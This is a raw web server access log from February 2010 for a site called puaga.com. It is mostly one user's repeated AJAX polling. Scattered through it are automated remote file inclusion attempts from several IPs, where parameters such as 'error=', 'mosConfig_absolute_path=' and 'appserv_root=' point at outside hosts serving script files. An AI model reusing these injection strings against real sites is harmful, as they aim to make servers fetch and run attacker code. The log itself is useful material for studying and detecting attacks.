88.235.89.20 - - [22/Feb/2010:04:21:59 -0800] "GET /musim/actions/listkiss_ajax.php?nocache=0.7038451004823655 HTTP/1.1" 200 19 "http://www.puaga.com/musim/container.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8 (.NET CLR 3.5.30729)" "www.puaga.com"
88.235.89.20 - - [22/Feb/2010:04:22:01 -0800] "GET /musim/actions/listkiss_ajax.php?nocache=0.2598952612818676 HTTP/1.1" 200 19 "http://www.puaga.com/musim/container.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8 (.NET CLR 3.5.30729)" "www.puaga.com"
202.124.116.194 - - [22/Feb/2010:04:22:01 -0800] "GET /errors.php?error=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
202.124.116.194 - - [22/Feb/2010:04:22:01 -0800] "GET /logs//errors.php?error=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.235.89.20 - - [22/Feb/2010:04:22:02 -0800] "GET /musim/subbar/meonline.php?nocache=0.4694733474504116 HTTP/1.1" 200 5 "http://www.puaga.com/musim/container.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8 (.NET CLR 3.5.30729)" "www.puaga.com"
88.235.89.20 - - [22/Feb/2010:04:22:02 -0800] "GET /musim/actions/listkiss_ajax.php?nocache=0.6753993398190592 HTTP/1.1" 200 19 "http://www.puaga.com/musim/container.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8 (.NET CLR 3.5.30729)" "www.puaga.com"
88.235.89.20 - - [22/Feb/2010:04:22:03 -0800] "GET /musim/actions/listkiss_ajax.php?nocache=0.07904724855211598 HTTP/1.1" 200 19 "http://www.puaga.com/musim/container.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8 (.NET CLR 3.5.30729)" "www.puaga.com"
88.235.89.20 - - [22/Feb/2010:04:22:05 -0800] "GET /musim/subbar/meonline.php?nocache=0.7781119609346698 HTTP/1.1" 200 5 "http://www.puaga.com/musim/container.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8 (.NET CLR 3.5.30729)" "www.puaga.com"
78.110.50.120 - - [22/Feb/2010:04:22:05 -0800] "GET /logs/access_100114.log///////?mosConfig_absolute_path=http://www.provedorm4net.com.br/portal/.laknat/laknat???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
78.110.50.120 - - [22/Feb/2010:04:22:05 -0800] "GET /logs///////?mosConfig_absolute_path=http://www.provedorm4net.com.br/portal/.laknat/laknat???? HTTP/1.1" 200 4952 "-" "libwww-perl/5.831" "www.puaga.com"
78.110.50.120 - - [22/Feb/2010:04:22:05 -0800] "GET //////?mosConfig_absolute_path=http://www.provedorm4net.com.br/portal/.laknat/laknat???? HTTP/1.1" 200 3642 "-" "libwww-perl/5.831" "www.puaga.com"
88.235.89.20 - - [22/Feb/2010:04:22:05 -0800] "GET /musim/actions/listkiss_ajax.php?nocache=0.6725920600985874 HTTP/1.1" 200 19 "http://www.puaga.com/musim/container.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8 (.NET CLR 3.5.30729)" "www.puaga.com"
88.235.89.20 - - [22/Feb/2010:04:22:06 -0800] "GET /musim/actions/listkiss_ajax.php?nocache=0.8169227250185153 HTTP/1.1" 200 19 "http://www.puaga.com/musim/container.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8 (.NET CLR 3.5.30729)" "www.puaga.com"
88.235.89.20 - - [22/Feb/2010:04:22:08 -0800] "GET /musim/subbar/meonline.php?nocache=0.751315341859654 HTTP/1.1" 200 5 "http://www.puaga.com/musim/container.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8 (.NET CLR 3.5.30729)" "www.puaga.com"
88.235.89.20 - - [22/Feb/2010:04:22:08 -0800] "GET /musim/actions/listkiss_ajax.php?nocache=0.09275947418510722 HTTP/1.1" 200 19 "http://www.puaga.com/musim/container.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8 (.NET CLR 3.5.30729)" "www.puaga.com"
88.235.89.20 - - [22/Feb/2010:04:22:09 -0800] "GET /musim/actions/listkiss_ajax.php?nocache=0.5766053531049622 HTTP/1.1" 200 19 "http://www.puaga.com/musim/container.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8 (.NET CLR 3.5.30729)" "www.puaga.com"
88.235.89.20 - - [22/Feb/2010:04:22:11 -0800] "GET /musim/subbar/meonline.php?nocache=0.9672649715073859 HTTP/1.1" 200 5 "http://www.puaga.com/musim/container.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8 (.NET CLR 3.5.30729)" "www.puaga.com"
88.235.89.20 - - [22/Feb/2010:04:22:11 -0800] "GET /musim/actions/listkiss_ajax.php?nocache=0.45608531572858624 HTTP/1.1" 200 19 "http://www.puaga.com/musim/container.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8 (.NET CLR 3.5.30729)" "www.puaga.com"
88.235.89.20 - - [22/Feb/2010:04:22:12 -0800] "GET /musim/actions/listkiss_ajax.php?nocache=0.2188499802820264 HTTP/1.1" 200 19 "http://www.puaga.com/musim/container.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8 (.NET CLR 3.5.30729)" "www.puaga.com"
88.235.89.20 - - [22/Feb/2010:04:22:14 -0800] "GET /musim/subbar/meonline.php?nocache=0.880150294948406 HTTP/1.1" 200 5 "http://www.puaga.com/musim/container.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8 (.NET CLR 3.5.30729)" "www.puaga.com"
88.235.89.20 - - [22/Feb/2010:04:22:14 -0800] "GET /musim/actions/listkiss_ajax.php?nocache=0.7786193102633931 HTTP/1.1" 200 19 "http://www.puaga.com/musim/container.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8 (.NET CLR 3.5.30729)" "www.puaga.com"
88.235.89.20 - - [22/Feb/2010:04:22:15 -0800] "GET /musim/actions/listkiss_ajax.php?nocache=0.6152090013899275 HTTP/1.1" 200 19 "http://www.puaga.com/musim/container.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8 (.NET CLR 3.5.30729)" "www.puaga.com"
202.124.116.194 - - [22/Feb/2010:04:22:15 -0800] "GET /logs/access_100214.log//errors.php?error=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.235.89.20 - - [22/Feb/2010:04:22:17 -0800] "GET /musim/subbar/meonline.php?nocache=0.42884420091752573 HTTP/1.1" 200 5 "http://www.puaga.com/musim/container.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8 (.NET CLR 3.5.30729)" "www.puaga.com"
88.235.89.20 - - [22/Feb/2010:04:22:17 -0800] "GET /musim/actions/listkiss_ajax.php?nocache=0.07546351098493964 HTTP/1.1" 200 19 "http://www.puaga.com/musim/container.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8 (.NET CLR 3.5.30729)" "www.puaga.com"
88.235.89.20 - - [22/Feb/2010:04:22:18 -0800] "GET /musim/actions/listkiss_ajax.php?nocache=0.6486462588775657 HTTP/1.1" 200 19 "http://www.puaga.com/musim/container.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8 (.NET CLR 3.5.30729)" "www.puaga.com"
88.235.89.20 - - [22/Feb/2010:04:22:20 -0800] "GET /musim/subbar/meonline.php?nocache=0.6078992892999887 HTTP/1.1" 200 5 "http://www.puaga.com/musim/container.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8 (.NET CLR 3.5.30729)" "www.puaga.com"
88.235.89.20 - - [22/Feb/2010:04:22:20 -0800] "GET /musim/actions/listkiss_ajax.php?nocache=0.508848123576817 HTTP/1.1" 200 19 "http://www.puaga.com/musim/container.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8 (.NET CLR 3.5.30729)" "www.puaga.com"
88.235.89.20 - - [22/Feb/2010:04:22:21 -0800] "GET /musim/actions/listkiss_ajax.php?nocache=0.900265422076505 HTTP/1.1" 200 19 "http://www.puaga.com/musim/container.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8 (.NET CLR 3.5.30729)" "www.puaga.com"
88.235.89.20 - - [22/Feb/2010:04:22:23 -0800] "GET /musim/subbar/meonline.php?nocache=0.17963177288581345 HTTP/1.1" 200 5 "http://www.puaga.com/musim/container.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8 (.NET CLR 3.5.30729)" "www.puaga.com"
88.235.89.20 - - [22/Feb/2010:04:22:23 -0800] "GET /musim/actions/listkiss_ajax.php?nocache=0.11486491073733962 HTTP/1.1" 200 19 "http://www.puaga.com/musim/container.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8 (.NET CLR 3.5.30729)" "www.puaga.com"
88.235.89.20 - - [22/Feb/2010:04:22:24 -0800] "GET /musim/actions/listkiss_ajax.php?nocache=0.06545457324233972 HTTP/1.1" 200 19 "http://www.puaga.com/musim/container.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8 (.NET CLR 3.5.30729)" "www.puaga.com"
88.235.89.20 - - [22/Feb/2010:04:22:26 -0800] "GET /musim/subbar/meonline.php?nocache=0.7582353231563026 HTTP/1.1" 200 5 "http://www.puaga.com/musim/container.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8 (.NET CLR 3.5.30729)" "www.puaga.com"
88.235.89.20 - - [22/Feb/2010:04:22:26 -0800] "GET /musim/actions/listkiss_ajax.php?nocache=0.9319580373608446 HTTP/1.1" 200 19 "http://www.puaga.com/musim/container.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8 (.NET CLR 3.5.30729)" "www.puaga.com"
88.235.89.20 - - [22/Feb/2010:04:22:27 -0800] "GET /musim/actions/listkiss_ajax.php?nocache=0.8051968612456217 HTTP/1.1" 200 19 "http://www.puaga.com/musim/container.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8 (.NET CLR 3.5.30729)" "www.puaga.com"
208.80.193.29 - - [22/Feb/2010:04:22:28 -0800] "GET / HTTP/1.0" 200 3626 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; AtHome021SI; .NET CLR 1.1.4322)" "www.puaga.com"
88.235.89.20 - - [22/Feb/2010:04:22:29 -0800] "GET /musim/subbar/meonline.php?nocache=0.2653404862721228 HTTP/1.1" 200 5 "http://www.puaga.com/musim/container.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8 (.NET CLR 3.5.30729)" "www.puaga.com"
88.235.89.20 - - [22/Feb/2010:04:22:29 -0800] "GET /musim/actions/listkiss_ajax.php?nocache=0.4328147156029952 HTTP/1.1" 200 19 "http://www.puaga.com/musim/container.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8 (.NET CLR 3.5.30729)" "www.puaga.com"
88.235.89.20 - - [22/Feb/2010:04:22:30 -0800] "GET /musim/actions/listkiss_ajax.php?nocache=0.8974541503386216 HTTP/1.1" 200 19 "http://www.puaga.com/musim/container.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8 (.NET CLR 3.5.30729)" "www.puaga.com"
202.124.116.194 - - [22/Feb/2010:04:22:30 -0800] "GET /logs/access_100207.log%20%20//errors.php?error=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
202.124.116.194 - - [22/Feb/2010:04:22:30 -0800] "GET /errors.php?error=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
202.124.116.194 - - [22/Feb/2010:04:22:30 -0800] "GET /logs//errors.php?error=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.235.89.20 - - [22/Feb/2010:04:22:32 -0800] "GET /musim/subbar/meonline.php?nocache=0.5037319876802689 HTTP/1.1" 200 5 "http://www.puaga.com/musim/container.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8 (.NET CLR 3.5.30729)" "www.puaga.com"
88.235.89.20 - - [22/Feb/2010:04:22:32 -0800] "GET /musim/actions/listkiss_ajax.php?nocache=0.046956470359183156 HTTP/1.1" 200 19 "http://www.puaga.com/musim/container.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8 (.NET CLR 3.5.30729)" "www.puaga.com"
88.235.89.20 - - [22/Feb/2010:04:22:33 -0800] "GET /musim/actions/listkiss_ajax.php?nocache=0.9278654287749892 HTTP/1.1" 200 19 "http://www.puaga.com/musim/container.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8 (.NET CLR 3.5.30729)" "www.puaga.com"
88.235.89.20 - - [22/Feb/2010:04:22:35 -0800] "GET /musim/subbar/meonline.php?nocache=0.04104622876261277 HTTP/1.1" 200 5 "http://www.puaga.com/musim/container.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8 (.NET CLR 3.5.30729)" "www.puaga.com"
88.235.89.20 - - [22/Feb/2010:04:22:35 -0800] "GET /musim/actions/listkiss_ajax.php?nocache=0.37603393460322376 HTTP/1.1" 200 19 "http://www.puaga.com/musim/container.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8 (.NET CLR 3.5.30729)" "www.puaga.com"
88.235.89.20 - - [22/Feb/2010:04:22:36 -0800] "GET /musim/actions/listkiss_ajax.php?nocache=0.28212303815525375 HTTP/1.1" 200 19 "http://www.puaga.com/musim/container.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8 (.NET CLR 3.5.30729)" "www.puaga.com"
69.147.244.168 - - [22/Feb/2010:04:22:37 -0800] "GET /logs/access_100207.log%20%20//errors.php?error=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.147.244.168 - - [22/Feb/2010:04:22:37 -0800] "GET /logs//errors.php?error=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.147.244.168 - - [22/Feb/2010:04:22:37 -0800] "GET /errors.php?error=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.235.89.20 - - [22/Feb/2010:04:22:38 -0800] "GET /musim/subbar/meonline.php?nocache=0.8087485512163821 HTTP/1.1" 200 5 "http://www.puaga.com/musim/container.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8 (.NET CLR 3.5.30729)" "www.puaga.com"
88.235.89.20 - - [22/Feb/2010:04:22:38 -0800] "GET /musim/actions/listkiss_ajax.php?nocache=0.46322760912763994 HTTP/1.1" 200 19 "http://www.puaga.com/musim/container.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8 (.NET CLR 3.5.30729)" "www.puaga.com"
88.235.89.20 - - [22/Feb/2010:04:22:39 -0800] "GET /musim/actions/listkiss_ajax.php?nocache=0.5987952156728505 HTTP/1.1" 200 19 "http://www.puaga.com/musim/container.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8 (.NET CLR 3.5.30729)" "www.puaga.com"
88.235.89.20 - - [22/Feb/2010:04:22:41 -0800] "GET /musim/subbar/meonline.php?nocache=0.585073219653028 HTTP/1.1" 200 5 "http://www.puaga.com/musim/container.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8 (.NET CLR 3.5.30729)" "www.puaga.com"
122.200.203.11 - - [22/Feb/2010:04:22:41 -0800] "GET /logs///appserv_root=http://bagas.110mb.com/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [22/Feb/2010:04:22:41 -0800] "GET /logs/access_100126.log///appserv_root=http://bagas.110mb.com/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [22/Feb/2010:04:22:41 -0800] "GET //appserv_root=http://bagas.110mb.com/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.235.89.20 - - [22/Feb/2010:04:22:41 -0800] "GET /musim/actions/listkiss_ajax.php?nocache=0.98867841666144 HTTP/1.1" 200 19 "http://www.puaga.com/musim/container.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8 (.NET CLR 3.5.30729)" "www.puaga.com"
69.147.244.168 - - [22/Feb/2010:04:22:41 -0800] "GET /logs/access_100213.log%20%20//errors.php?error=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.235.89.20 - - [22/Feb/2010:04:22:42 -0800] "GET /musim/actions/listkiss_ajax.php?nocache=0.2212212643057727 HTTP/1.1" 200 19 "http://www.puaga.com/musim/container.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8 (.NET CLR 3.5.30729)" "www.puaga.com"
88.235.89.20 - - [22/Feb/2010:04:22:44 -0800] "GET /musim/subbar/meonline.php?nocache=0.4453784594381244 HTTP/1.1" 200 5 "http://www.puaga.com/musim/container.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8 (.NET CLR 3.5.30729)" "www.puaga.com"
88.235.89.20 - - [22/Feb/2010:04:22:44 -0800] "GET /musim/actions/listkiss_ajax.php?nocache=0.46745887303913136 HTTP/1.1" 200 19 "http://www.puaga.com/musim/container.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8 (.NET CLR 3.5.30729)" "www.puaga.com"
88.235.89.20 - - [22/Feb/2010:04:22:45 -0800] "GET /musim/actions/listkiss_ajax.php?nocache=0.5077458342668718 HTTP/1.1" 200 19 "http://www.puaga.com/musim/container.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8 (.NET CLR 3.5.30729)" "www.puaga.com"
88.235.89.20 - - [22/Feb/2010:04:22:47 -0800] "GET /musim/subbar/meonline.php?nocache=0.6133085833603846 HTTP/1.1" 200 5 "http://www.puaga.com/musim/container.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8 (.NET CLR 3.5.30729)" "www.puaga.com"
88.235.89.20 - - [22/Feb/2010:04:22:47 -0800] "GET /musim/actions/listkiss_ajax.php?nocache=0.7093790421017658 HTTP/1.1" 200 19 "http://www.puaga.com/musim/container.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8 (.NET CLR 3.5.30729)" "www.puaga.com"
88.235.89.20 - - [22/Feb/2010:04:22:48 -0800] "GET /musim/actions/listkiss_ajax.php?nocache=0.32006364882191674 HTTP/1.0" 200 3 "http://www.puaga.com/musim/container.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8 (.NET CLR 3.5.30729)" "www.puaga.com"
202.124.116.194 - - [22/Feb/2010:04:22:49 -0800] "GET /errors.php?error=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
202.124.116.194 - - [22/Feb/2010:04:22:49 -0800] "GET /logs/access_100214.log//errors.php?error=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
202.124.116.194 - - [22/Feb/2010:04:22:49 -0800] "GET /logs//errors.php?error=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.235.89.20 - - [22/Feb/2010:04:22:50 -0800] "GET /musim/subbar/meonline.php?nocache=0.4857933170491854 HTTP/1.1" 200 5 "http://www.puaga.com/musim/container.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8 (.NET CLR 3.5.30729)" "www.puaga.com"
88.235.89.20 - - [22/Feb/2010:04:22:50 -0800] "GET /musim/actions/listkiss_ajax.php?nocache=0.7786497574838808 HTTP/1.1" 200 19 "http://www.puaga.com/musim/container.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8 (.NET CLR 3.5.30729)" "www.puaga.com"
88.235.89.20 - - [22/Feb/2010:04:22:51 -0800] "GET /musim/actions/listkiss_ajax.php?nocache=0.9135049749361297 HTTP/1.1" 200 19 "http://www.puaga.com/musim/container.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8 (.NET CLR 3.5.30729)" "www.puaga.com"
88.235.89.20 - - [22/Feb/2010:04:22:53 -0800] "GET /musim/subbar/meonline.php?nocache=0.2654430323012119 HTTP/1.1" 200 5 "http://www.puaga.com/musim/container.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8 (.NET CLR 3.5.30729)" "www.puaga.com"
88.235.89.20 - - [22/Feb/2010:04:22:53 -0800] "GET /musim/actions/listkiss_ajax.php?nocache=0.09536399073388335 HTTP/1.1" 200 19 "http://www.puaga.com/musim/container.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8 (.NET CLR 3.5.30729)" "www.puaga.com"
88.235.89.20 - - [22/Feb/2010:04:22:54 -0800] "GET /musim/actions/listkiss_ajax.php?nocache=0.7940228365586279 HTTP/1.1" 200 19 "http://www.puaga.com/musim/container.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8 (.NET CLR 3.5.30729)" "www.puaga.com"
58.150.99.144 - - [22/Feb/2010:04:22:55 -0800] "GET /logs//errors.php?error=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [22/Feb/2010:04:22:55 -0800] "GET /logs/access_100203.log%20%20//errors.php?error=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [22/Feb/2010:04:22:55 -0800] "GET /errors.php?error=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.235.89.20 - - [22/Feb/2010:04:22:56 -0800] "GET /musim/subbar/meonline.php?nocache=0.8067345959379241 HTTP/1.1" 200 5 "http://www.puaga.com/musim/container.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8 (.NET CLR 3.5.30729)" "www.puaga.com"
88.235.89.20 - - [22/Feb/2010:04:22:56 -0800] "GET /musim/actions/listkiss_ajax.php?nocache=0.2704376335037709 HTTP/1.1" 200 19 "http://www.puaga.com/musim/container.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8 (.NET CLR 3.5.30729)" "www.puaga.com"
88.235.89.20 - - [22/Feb/2010:04:22:57 -0800] "GET /musim/actions/listkiss_ajax.php?nocache=0.09723573827948984 HTTP/1.1" 200 19 "http://www.puaga.com/musim/container.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8 (.NET CLR 3.5.30729)" "www.puaga.com"
88.235.89.20 - - [22/Feb/2010:04:22:59 -0800] "GET /musim/subbar/meonline.php?nocache=0.05926009866378401 HTTP/1.1" 200 5 "http://www.puaga.com/musim/container.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8 (.NET CLR 3.5.30729)" "www.puaga.com"
88.235.89.20 - - [22/Feb/2010:04:22:59 -0800] "GET /musim/actions/listkiss_ajax.php?nocache=0.2396259994121024 HTTP/1.1" 200 19 "http://www.puaga.com/musim/container.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8 (.NET CLR 3.5.30729)" "www.puaga.com"
88.235.89.20 - - [22/Feb/2010:04:23:00 -0800] "GET /musim/actions/listkiss_ajax.php?nocache=0.03348302590111707 HTTP/1.1" 200 19 "http://www.puaga.com/musim/container.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8 (.NET CLR 3.5.30729)" "www.puaga.com"
88.235.89.20 - - [22/Feb/2010:04:23:02 -0800] "GET /musim/subbar/meonline.php?nocache=0.2085898090773698 HTTP/1.1" 200 5 "http://www.puaga.com/musim/container.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8 (.NET CLR 3.5.30729)" "www.puaga.com"
88.235.89.20 - - [22/Feb/2010:04:23:02 -0800] "GET /musim/actions/listkiss_ajax.php?nocache=0.6547617091330377 HTTP/1.1" 200 19 "http://www.puaga.com/musim/container.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8 (.NET CLR 3.5.30729)" "www.puaga.com"
88.235.89.20 - - [22/Feb/2010:04:23:03 -0800] "GET /musim/actions/listkiss_ajax.php?nocache=0.6258167417777687 HTTP/1.1" 200 19 "http://www.puaga.com/musim/container.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8 (.NET CLR 3.5.30729)" "www.puaga.com"
88.235.89.20 - - [22/Feb/2010:04:23:05 -0800] "GET /musim/subbar/meonline.php?nocache=0.06886567567802404 HTTP/1.1" 200 5 "http://www.puaga.com/musim/container.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8 (.NET CLR 3.5.30729)" "www.puaga.com"
88.235.89.20 - - [22/Feb/2010:04:23:05 -0800] "GET /musim/actions/listkiss_ajax.php?nocache=0.33265397556720155 HTTP/1.1" 200 19 "http://www.puaga.com/musim/container.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8 (.NET CLR 3.5.30729)" "www.puaga.com"
88.235.89.20 - - [22/Feb/2010:04:23:06 -0800] "GET /musim/actions/listkiss_ajax.php?nocache=0.5273185262712716 HTTP/1.1" 200 19 "http://www.puaga.com/musim/container.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8 (.NET CLR 3.5.30729)" "www.puaga.com"
